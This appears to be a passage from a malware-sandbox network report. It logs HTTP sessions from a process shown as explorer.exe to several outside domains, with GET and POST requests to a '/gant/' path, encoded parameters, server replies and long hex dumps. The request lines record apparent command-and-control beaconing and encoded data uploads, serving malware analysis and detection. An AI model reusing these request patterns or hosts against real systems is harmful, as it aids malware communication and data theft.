                                                                                                                  Data Ascii: p2KWbtJFkml4A(CdUsAN-Iq(3cnch~0NUCI~hTsY_MBOo4LKwCFEAKhk8uh0SJxFRMi3v7zRufBuc2mlVa67I8HWxCX4dQkGtZ12J7T(7qVhMNqtnlsfEGvg9TE1vr5jMqAysuiZ498nTMaiu~yBOQePszBLQtKFIn5ck~kKlz65oStAIqvOn7rMpm5oAQhMwnDkq~k9HQfw1xqcxAGIr(DlEEm1RSu9KqWZx8xxV5yuWzCq7Jc
                                                                                                                  Feb 13, 2023 19:05:17.280185938 CET1408OUTData Raw: 45 38 4d 28 30 46 59 34 54 69 61 5a 76 47 37 71 39 57 64 48 5f 6c 65 4e 59 62 4b 37 67 53 48 66 4f 33 45 56 69 6f 43 43 5f 6b 47 61 36 39 38 28 64 64 66 6f 70 6d 37 73 5a 67 45 37 2d 42 6f 72 6c 32 44 30 4d 31 48 5a 45 57 52 79 5a 70 4c 6a 61 7a
                                                                                                                  Data Ascii: E8M(0FY4TiaZvG7q9WdH_leNYbK7gSHfO3EVioCC_kGa698(ddfopm7sZgE7-Borl2D0M1HZEWRyZpLjazhaFgH09mxOE9oDV3gAdE-4GlmJnwsMJF5K6qLxI1MV7EAE-4dkGEvEpfsWOwM95kjuw6hAhAXEGAdeg6YB_HSY0eRN8YYU_XRwQEdUEuf25Ej5LfmLVXdUv~oJxUqSz1ME6lqwXkdalH1VGspChlMJ97M(-EtQ8GI
                                                                                                                  Feb 13, 2023 19:05:17.448317051 CET1410OUTData Raw: 6b 6e 63 37 6a 69 57 49 4b 64 6d 68 50 74 49 32 49 50 4c 44 33 42 52 64 53 50 53 61 49 42 42 6c 4e 47 52 42 4b 77 55 71 78 52 4c 43 44 39 5f 6a 49 31 56 42 31 32 52 38 78 52 4f 34 42 59 66 32 52 79 4c 37 54 41 4a 66 72 4a 62 77 57 67 6a 34 39 74
                                                                                                                  Data Ascii: knc7jiWIKdmhPtI2IPLD3BRdSPSaIBBlNGRBKwUqxRLCD9_jI1VB12R8xRO4BYf2RyL7TAJfrJbwWgj49tFNV6ZAl6jDMT4ksuF3WQoow9eld1dXJJgJH9790XkX7zu~M5AeMiSSB1ssQ6XtN34lCHXxT2yDMZOybgdUCrdZ8I2X6P-EiUvJnOjd4CwAa~8jOq5TRObDHhxGEcuB3qXPBge5DfmFEllM48iykUBq9yndN0PlbYu
                                                                                                                  Feb 13, 2023 19:05:17.449515104 CET1420OUTData Raw: 73 53 67 78 31 44 53 36 59 31 44 51 62 69 6b 41 2d 67 48 73 48 49 4a 74 4f 48 64 63 6c 46 59 4a 68 30 43 5a 38 32 33 6b 49 65 4e 47 46 6b 30 66 45 49 47 6b 72 44 45 61 4f 6f 67 31 58 75 30 68 61 4a 73 56 52 30 34 70 77 43 66 38 75 38 38 7a 79 48
                                                                                                                  Data Ascii: sSgx1DS6Y1DQbikA-gHsHIJtOHdclFYJh0CZ823kIeNGFk0fEIGkrDEaOog1Xu0haJsVR04pwCf8u88zyHpbgy314VZBEyIf1rX7jy-UK3oYlhwfJB0ISBnEJY7RKkPLC2YESozYtOOM2HtTt9BXB2YPpzJjW(yHSlODRZpqPWEKCHYXm0ONHSCTdLK5aM7AZjFl-MhGjuAb04_Nag8kTrLp00QanZeYurlLGUSEYTqdBXwKmAV
                                                                                                                  Feb 13, 2023 19:05:17.449598074 CET1424OUTData Raw: 42 75 2d 59 37 6b 57 48 63 46 45 37 35 46 32 6c 59 49 63 46 55 55 69 52 64 72 72 33 61 4d 79 78 4a 51 6d 74 2d 61 2d 79 61 6c 48 57 46 62 6a 7a 54 78 65 69 72 6c 4a 42 51 54 31 74 5a 49 70 79 6c 55 63 52 4e 5a 65 45 65 59 7a 49 4a 38 66 77 7a 31
                                                                                                                  Data Ascii: Bu-Y7kWHcFE75F2lYIcFUUiRdrr3aMyxJQmt-a-yalHWFbjzTxeirlJBQT1tZIpylUcRNZeEeYzIJ8fwz1ztGaN8bP2ugfTdD4jlhJ2R794WhPqlX~hETsBQzoTzTBjENM3L6492zFthwfL8uRV27iwMOMkV4YNa_pDG8Js1Snf5XNGAaPL9QVXNAHQK0sMlhFo94ie0jYdUmFc~9brFFBqDHwJNPrncljCXH4CQ6q-Cc9ac_VC
                                                                                                                  Feb 13, 2023 19:05:18.407152891 CET1425INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  x-litespeed-tag: 90d_HTTP.404
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  link: <https://treebarktees.com/index.php/wp-json/>; rel="https://api.w.org/"
                                                                                                                  x-litespeed-cache-control: no-cache
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  Data Raw: 39 36 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 b6 b1 e8 e7 9d aa fc 07 98 5b de 19 25 24 45 f0 25 4a f3 f0 49 d6 ce b1 ab ec 24 95 75 7c ea 56 d6 35 05 91 90 c4 5d 8a 64 48 6a 34 e3 39 53 75 ff c6 fd 7b f7 97 dc ea 06 48 82 12 f5 98 57 ee c9 63 13 ef 52 24 d0 dd 68 34 1a 8d 46 a3 71 f1 c5 d7 7f 7c ff e3 ff fa d3 37 64 51 2d 93 ab 93 0b f8 87 24 2c 9d 5f 6a 3c 35 fe f2 41 83 77 9c 45 57 27 6f 2e 96 bc 62 24 5c b0 a2 e4 d5 a5 f6 97 1f 7f 6f 04 1a 19 36 5f 52 b6 e4 97 da 4d cc d7 79 56 54 1a 09 b3 b4 e2 69 75 a9 ad e3 a8 5a 5c 46 fc 26 0e b9 81 3f 74 12 a7 71 15 b3 c4 28 43 96 f0 4b 8a 70 88 fc 73 51 56 77 09 bf 3a a9 7f c3 bf e6 3a cb a7 46 b9 66 55 b8 20 f7 9d 4f f0 79 19 a7 02 f2 84 d8 5e 7e 7b de 5b 60 c1 e3 f9 a2 ea 2b f1 d0 29 df c1 15 2f e7 3d f8 b0 15 7d 90 80 98 63 f0 5c 0c 65 23 4f 04 5b 91 79 a7 45 36 cd aa f2 b4 61 dd e9 92 dd 1a f1 92 cd b9 91 17 1c 58 3b 49 58 31 e7 a7 c0 f6 8b 2a ae 12 7e f5 27 36 e7 24 cd 2a 32 cb 56 69 44 de bd 0d 6c 4a cf c9 8f 05 e7 53 56 7c be 18 8a 62 27 17 49 9c 7e 26 05 4f 2e 4f a3 b4 04 78 33 5e 85 8b 53 b2 28 f8 ec f2 74 38 ac 64 8d 8a f3 d2 0c b3 a5 40 d2 d4 d2 58 52 f1 22 65 15 d7 48 75 97 f3 4b 8d e5 79 12 87 ac 8a b3 74 58 94 e5 6f 6e 97 89 46 10 db a5 56 a3 27 ef 0a f6 b7 55 76 4e 7e cf 79 a4 09 5c da a2 aa f2 72 b2 8d 71 18 a7 11 bf 35 f3 45 3e 9c 71 1e 0d 51 2a 5a ba 9f 49 c1 fb 6c b9 e4 69 55 3e 96 94 50 d6 53 69 2a c3 22 ce ab ab 93 75 9c 46 d9 da bc 5e e7 7c 99 7d 8a 3f f0 aa 8a d3 79 49 2e c9 bd 36 65 25 ff 4b 91 68 13 d9 de 8f c3 8f c3 d2 5c 9b 59 31 ff 38 c4 4e 2d 3f 0e c3 ac e0 1f 87 58 f9 e3 90 ba a6 65 5a 1f 87 23 fb 76 64 7f 1c 6a ba c6 6f 2b 6d a2 99 79 3a d7 74 ad bc 99 3f 0d 5e 79 33 47 68 e5 cd fc 1b 01 b0 bc 41 80 d9 aa 08 b9 36 b9 d7 c2 2c 0d 59 85 64 48 7a 27 40 ee a6 48 7c 1c ae 73 23 4e c3 64 15 f1 f2 e3 f0 53 89 2f b0 9a 51 f0 84 b3 92 9b cb 38 35 3f 95 5f dd f0 e2 d2 37 a9 49 b5 87 87 f3 93 e1 af bf 20 3f 2e e2 92 cc e2 84 93 b8 24 6c 55 65 c6 9c a7 bc 60 15 8f c8 af 87 27 5f cc 56 69 08 b2 74 c6 75 a6 57 83 fb 1b 56 90 54 2f f4 4c 8f 2f 99 19 16 9c 55 fc 9b 84 43 1f 9e 69 21 4b 6f 58 a9 0d f4 fc 32 36 e7 bc 7a 0f ca e6 b6 7a f7 4e fd 75 a6 d9 91 36 38 af 01 93 f2 8c d7 80 d9 e5 87 aa 88 d3 b9 39 2b b2 e5 fb 05 2b de 67 11 d7 f9 e5 59 6e 86 09 67 c5 9f 79 58 9d 59 ba a5 c7 a6 d0 58 b1 29 86 f5 40 cf cd 59 9c 24 3f f2 db ea 8c 99 30 06 ee ce aa 45 5c ea 7c a0 5b ba 35 d0 63 b3 ca be 66 15 fb cb 9f bf 3f
                                                                                                                  Data Ascii: 968}k[%$E%JI$u|V5]dHj49Su{HWcR$h4Fq|7dQ-$,_j<5AwEW'o.b$\o6_RMyVTiuZ\F&?tq(CKpsQVw::FfU Oy^~{[`+)/=}c\e#O[yE6aX;IX1*~'6$*2ViDlJSV|b'I~&O.Ox3^S(t8d@XR"eHuKytXonFV'UvN~y\rq5E>qQ*ZIliU>PSi*"uF^|}?yI.6e%Kh\Y18N-?XeZ#vdjo+my:t?^y3GhA6,YdHz'@H|s#NdS/Q85?_7I ?.$lUe`'_VituWVT/L/UCi!KoX26zzNu689++gYngyXYX)@Y$?0E\|[5cf?
                                                                                                                  Feb 13, 2023 19:05:18.407988071 CET1427INData Raw: 1b 0c ce 0b 5e ad 8a 94 3c 1d 6e 25 e1 f2 cb cb cb 0e ec 87 a6 61 e1 19 17 fc aa b6 39 25 44 55 1b 9c 57 66 59 84 97 5c af cc 88 cf 78 71 59 99 62 18 03 df 86 9f d8 0d 93 25 75 06 0c 95 9c 2e 7f 77 f7 23 9b ff 81 2d f9 99 06 f3 80 36 f8 ab f5 33
                                                                                                                  Data Ascii: ^<n%a9%DUWfY\xqYb%u.w#-63EDgagoilYYr{~j6yLx:o~3h5ku,Apq'q/*5&%cEM\?Vq0}
                                                                                                                  Feb 13, 2023 19:05:18.408090115 CET1428INData Raw: b7 2c a9 09 6b 11 a4 59 17 c5 83 22 f0 b2 b4 c9 0a 6e d4 f3 53 72 27 66 28 1e 19 55 96 df ab 04 21 d0 b2 62 45 75 3c 8c 90 a7 15 2f 3a 60 c4 ab e3 41 08 86 76 40 20 25 3c 8d 5a 96 b0 5b e9 0b 1b 05 b4 97 25 42 32 e2 d2 48 b3 ca 28 2b 16 7e e6 91
                                                                                                                  Data Ascii: ,kY"nSr'f(U!bEu</:`Av@ %<Z[%B2H(+~2\mqLYjY_*bm<p:9X-!&"[O68}gFD`.nzHk^h@5[*m`YQ)=oGuLIs~$F)x-y2;t(1>wA?
                                                                                                                  Feb 13, 2023 19:05:18.408159018 CET1429INData Raw: 0a e8 9e 86 f5 b3 ba 1e f0 cd 8e 06 86 b7 9d 51 93 0e fa 2b 08 a5 21 37 5c 5a f1 55 e7 94 f6 ad c1 d2 70 91 15 3b 44 bb bf 4e ff 5b 09 69 c2 c2 2a be e1 2f 08 10 15 de 0b c2 bb 89 61 06 8a 5e 0e 22 2e 53 c4 7a ac b3 0c d9 5a 98 ec e8 af c6 d3 88
                                                                                                                  Data Ascii: Q+!7\ZUp;DN[i*/a^".SzZ#Y6`S'YsFb%%KpD,B{PQ2!Af(0xH9"0XA_l/iJ>v`|4k6{Qd*z0\/^Vg,,F
                                                                                                                  Feb 13, 2023 19:05:18.409369946 CET1431INData Raw: 21 2a b7 39 28 5e 87 59 74 55 70 0f a6 16 5a c1 13 06 21 30 af 42 f7 1c 02 a5 78 da e3 83 c6 60 a6 9c 41 14 fc ab 60 8e e2 a5 61 dd 67 39 0b e3 ea 6e a2 4e c0 3d dc 78 7a af 18 b4 45 62 aa c7 f2 5e 16 8b ad 60 b1 5f 8d 5f 8e 82 c5 79 35 2c ae 82
                                                                                                                  Data Ascii: !*9(^YtUpZ!0Bx`A`ag9nN=xzEb^`__y5,EyYy+XTe`Z[KjXaV3!%L3xP&A9b`kC!9_dt5WjyjM(_MTA4=qf<K8w1I6ELI
                                                                                                                  Feb 13, 2023 19:05:18.409482956 CET1432INData Raw: 21 ef 27 66 de ff 79 70 af 0e 84 ae 5b fe 61 16 cf 57 05 6f 16 ba c4 02 ff 42 ff 12 64 9e 64 53 b8 f2 00 16 fe 1b 47 de a7 59 74 27 96 1f 8d b1 8a 52 6b 18 d3 84 85 9f 27 04 62 93 21 ea b5 37 ff 66 6d bd c5 c2 c0 ba 9b 90 b7 6c 3a 0d 42 a7 bf f8
                                                                                                                  Data Ascii: !'fyp[aWoBddSGYt'Rk'b!7fml:BzW|BO%PFAb<a><6qJiofE|H:l9ogtwitMp*W91~)5Gt04JSyB;:Zg$SN[yY]
                                                                                                                  Feb 13, 2023 19:05:18.410159111 CET1433INData Raw: b5 a6 71 1b 47 54 57 2e 54 12 ba 7a e6 20 2b 14 1d 83 5b 23 5d d6 cd 59 6e 18 70 91 27 40 05 93 6c 8b b9 58 62 91 15 f1 2f 10 5b 95 4c 30 56 0d ba 5c 87 5b 90 36 b5 0d 96 ae 43 b6 0f 94 4d 18 9c 9b 86 4b 96 f0 1e 5d 79 b5 92 63 41 b0 d4 46 b3 ea
                                                                                                                  Data Ascii: qGTW.Tz +[#]Ynp'@lXb/[L0V\[6CMK]ycAF\#oF|hH[;L2?T'Y!\k^=J`$LVGUj5%J0z3fVITNH5O$D$%6_j?r@l{Jd7WR'w=Mu.H.fd
                                                                                                                  Feb 13, 2023 19:05:18.410250902 CET1435INData Raw: 10 f0 4d 20 3d 78 e4 0c f5 04 ca 8f 98 99 9e 00 f5 c8 19 e9 09 90 c5 18 7f d4 4c f4 04 2c 1b 13 81 58 7d f4 f0 7d a3 9c 9c 81 9e 8f f0 f8 99 e7 29 b8 9e 32 e3 3c 01 cf 13 66 9a 27 60 79 fc 0c f3 04 24 8f 9d 59 9e 8c 62 ff 8c f2 04 b0 7b 66 92 27
                                                                                                                  Data Ascii: M =xL,X}})2<f'`y$Yb{f'@;<O?SlC{KAvR$}IS>-1[rA6}qYCy.zoM6Ot|/I^8,CUgg'ilujP=[=UR&2d
                                                                                                                  Feb 13, 2023 19:05:18.410317898 CET1436INData Raw: 9f 6f 62 be 7e 05 6a 1b d8 48 6f f3 eb 99 14 df b0 22 46 8f 97 51 ae 59 15 2e 78 f9 0a a4 37 48 ae 6b 24 d8 86 ed d7 cf 6c cc 3a 2e 17 ed dd 3f 8f 5c f9 ec 97 95 1a b4 70 27 48 3c 4f 27 f7 6f c9 9a e5 f9 13 29 5c e7 46 7d 75 a6 11 2e 58 35 9c ae
                                                                                                                  Data Ascii: ob~jHo"FQY.x7Hk$l:.?\p'H<O'o)\F}u.X5$Ld! jM=+Tw9IV-hzh>^/5eEx,I*f6k$yxxFQ("y/pr8abX-b(Z~c8J%+|p9NE\H\I
                                                                                                                  Feb 13, 2023 19:05:18.411681890 CET1437INData Raw: 51 dd 96 69 e3 e8 70 46 28 a9 b6 22 a1 fb 25 dd 6b 4c 20 d7 a3 20 e8 bb c0 fc 0d 0a 62 35 30 0d 0a 5b d0 5f 4f d0 eb 30 f4 7f 59 41 b7 14 79 dd 6f a3 58 66 ab 98 61 02 50 2a ee 15 f4 ce 58 fa b7 2c bf a2 2c 77 6e d5 f9 57 95 68 73 a4 ae 2e bd 8e
                                                                                                                  Data Ascii: QipF("%kL b50[_O0YAyoXfaP*X,,wnWhs.q9V e+q,(xW@Wvrsn}pQ^kY t"rCWB=uKm]o{F<JB{':#Y[<
                                                                                                                  Feb 13, 2023 19:05:18.577562094 CET1439INData Raw: e7 b5 58 80 6e 03 52 8c e4 bc 20 10 3a 86 88 65 38 92 a4 b4 8e 20 13 86 76 5b f7 00 85 02 d2 46 b3 af af f1 b5 26 63 26 4b 19 3f 76 a9 69 24 4f 58 c8 17 59 12 f1 02 7e 92 e6 88 fc b0 59 20 88 f3 0b e5 6a ba 8c ab dd ac 69 19 de bd 68 42 23 a4 61
                                                                                                                  Data Ascii: XnR :e8 v[F&c&K?vi$OXY~Y jihB#a2ru1aMss8& SY\n/tc[dvY1[M0KRNecH_Exl%mMUy*bQHoJ?{s\Is0N;t


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  59192.168.11.2049916103.191.208.5080C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:19.753523111 CET1450OUTGET /gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.treebarktees.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:05:19.889307976 CET1450INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.1.15
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  x-redirect-by: WordPress
                                                                                                                  location: http://treebarktees.com/gant/?j-Jh9P=TyiG4SYT4QZjW5cpsFN/2IY0LPBGgIfJh6ADM61dYWsbGNZtiA4uKO4tvwXfoLZtueIaX5TbuF1grn0UQt7nGEyexgA9LEEsmA==&T9=bPxTYTKdI2
                                                                                                                  x-litespeed-cache: hit


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  6192.168.11.2049845217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:07.775017023 CET502OUTGET /gant/?j-Jh9P=2JL3CIBt3IC0PgoAudQ1L9Eb6D+VDac3U4mviwi6NXYkyXwKlhT1jupAATRxZoEWPtU5/NPFAf7q3b9zYMRU8+5k3iEXReAvBw==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:00:07.792687893 CET503INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 837
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:07 GMT
                                                                                                                  Server: Apache
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Le fichier requis n'a pas &eacute;t&eacute; trouv&eacute;.Il peut s'agir d'une erreur technique. Veuillez r&eacute;essayer ult&eacute;rieurement. Si vous ne pouvez pas acc&eacute;der au fichier apr&egrave;s plusieurs tentatives, cela signifie qu'il a &eacute;t&eacute; supprim&eacute;. </p> </body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  60192.168.11.2049917188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:05:24.900933027 CET1451OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 39 41 49 74 33 64 6e 78 54 53 4d 6f 34 39 30 34 48 69 39 77 7e 34 54 72 39 43 53 47 50 54 64 46 41 66 4d 4b 50 59 7a 68 77 32 79 37 63 75 32 44 31 75 58 55 7e 6c 38 51 78 45 70 5f 6f 73 6f 69 33 57 7a 44 53 66 4b 79 37 4d 53 35 63 6a 34 61 4e 43 52 79 49 4a 53 34 32 7a 34 53 51 56 63 63 43 4d 74 77 35 6c 45 36 5a 53 41 4b 61 69 71 56 6f 42 4c 45 4e 70 79 47 67 7a 39 67 6c 6e 55 57 39 34 51 44 39 54 48 52 4b 52 54 76 54 75 34 53 63 44 56 4b 45 33 28 54 58 7a 32 64 52 56 69 43 52 6b 66 5a 48 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ49AIt3dnxTSMo4904Hi9w~4Tr9CSGPTdFAfMKPYzhw2y7cu2D1uXU~l8QxEp_osoi3WzDSfKy7MS5cj4aNCRyIJS42z4SQVccCMtw5lE6ZSAKaiqVoBLENpyGgz9glnUW94QD9THRKRTvTu4ScDVKE3(TXz2dRViCRkfZHg).
                                                                                                                  Feb 13, 2023 19:05:25.216701984 CET1453INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:05:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kAyLPb6LWl1T%2BEpWbuT177iAfcBcbSiZgW6W1bdN4jQvqCyCbz2b9LuWLpmtf%2B%2FLgPzaY1HHwf3REV%2FKyUOBA1yi8%2BeAzqmMH5bQFMv6dokCP8nBjYqTFI0XNeXPjFUuCu9r210%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7df6aed23a86-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 2c 3f 22 8d 54 74 1d 2f ea dd 34 31 6a 07 6d 50 14 06 67 78 47 c3 98 43 4e 49 4a b2 90 fa bf 2f 38 0f 79 f4 88 9b 60 b1 a8 3f 58 c3 d7 e5 7d 1c 5e 1e de f0 d5 9b f7 97 77 1f 6f ae 20 75 99 9c b7 c2 57 94 fe 26 12 90 0e ae af e0 fc f7 39 84 7e 00 62 c9 ac 9d 11 a5 e9 27 0b 02 cf 40 4b 2e 90 80 64 6a 31 23 a8 e8 87 5b 32 87 f0 d5 6f a8 b8 48 7e a7 f4 59 54 25 07 e0 b8 a8 f3 6f 13 75 f1 82 a8 8b 6f 10 b5 70 95 34 df 71 cc ca 43 29 94 ee 4a 4a 91 f1 79 2b 74 c2 49 9c bf 79 77 0b b9 16 ca 59 70 1a 72 a3 53 11 09 87 1c ae 6f e0 4f 58 af d7 7d ed 74 ae b9 d4 0b d1 8f 75 06 7f c2 a5 d4 4b 9e 48 66 30 0c 4a 21 ad 30 43 c7 20 4e 99 b1 e8 66 e4 c3 dd bf e8 05 81 a0 1e 48 9d cb 29 fe b1 14 ab 19 b9 d4 ca a1 72 f4 6e 93 23 81 b8 6c cd 88 c3 47 17 78 63 a6 5b 31 2f 49 f9 95 7e f8 81 5e ea 2c 67 4e 44 b2 29 e8 fa 6a 76 c5 17 d8 58 a7 58 86 33 62 74 a4 9d 6d 4c 54 5a 28 8e 8f 3d 50 3a d1 52 ea f5 c1 92 95 c0 75 ae 8d 6b 2c 5a 0b ee d2 19 c7 95 88 91 16 8d 9e 50 c2 09 26 a9 8d 99 c4 d9 b0 94 22 85 7a 00 83 72 46 ac db 48 b4 29 a2 23 20 f8 8c c4 c9 7d d9 45 63 6b 09 a4 06 93 19 09 62 ae 68 bc 10 41 39 14 64 4c a8 7e 31 1e cc 5b ad 56 68 63 23 72 37 6f 75 92 a5 8a 9d d0 aa d3 fd 2c 92
                                                                                                                  Data Ascii: 890Xko7_qT5,?"Tt/41jmPgxGCNIJ/8y`?X}^wo uW&9~b'@K.dj1#[2oH~YT%ouop4qC)JJy+tIywYprSoOX}tuKHf0J!0C NfH)rn#lGxc[1/I~^,gND)jvXX3btmLTZ(=P:Ruk,ZP&"zrFH)# }EckbhA9dL~1[Vhc#r7ou,
